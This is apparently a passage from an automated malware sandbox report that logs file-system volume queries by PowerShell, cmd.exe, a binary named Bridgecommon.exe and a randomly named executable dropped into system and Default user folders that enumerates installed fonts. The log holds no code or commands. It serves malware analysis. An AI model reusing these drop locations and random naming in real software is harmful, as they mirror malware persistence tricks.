                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeQueries volume information: C:\hyperContaineragent\Bridgecommon.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
